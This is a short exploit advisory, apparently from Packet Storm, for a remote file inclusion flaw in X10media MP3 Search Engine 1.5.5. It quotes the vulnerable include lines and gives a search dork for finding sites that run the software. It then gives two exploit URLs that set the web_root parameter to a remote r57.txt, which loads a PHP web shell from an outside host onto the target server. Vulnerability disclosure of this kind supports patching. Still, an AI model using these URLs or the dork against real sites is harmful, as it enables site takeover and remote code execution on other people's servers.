X10media MP3 Search Engine version 1.5.5 suffers from a remote file inclusion vulnerability.
0f845085ec13714c3b5c7a068e36f0908d9b4d9236ca2962ce0c3dd7c66132e0################## THUNDER #########################################################
#
#
# X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
#
# Founded by : THUNDER <t4h [2ec] hotmail.fr>
# Dork: "This search engine is in no way intended for illegal downloads."
#
##### Vuln Code: ###################################################################
#
# file : /includes/function_core.php
# -88.- include ($web_root."js/Mp3Player.php");
#
#-----------------------------------------------------------------
#
# file : /templates/layout_lyrics.php
# .5.- include ($web_root."includes/function_list.php");
#
###### Exploit #####################################################################
#
# http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
#
# http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?
#
#
#
###### Greets #######################################################################
#
# MoRoCcan InjEctor5 Te4m and All Hackers
#
####################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed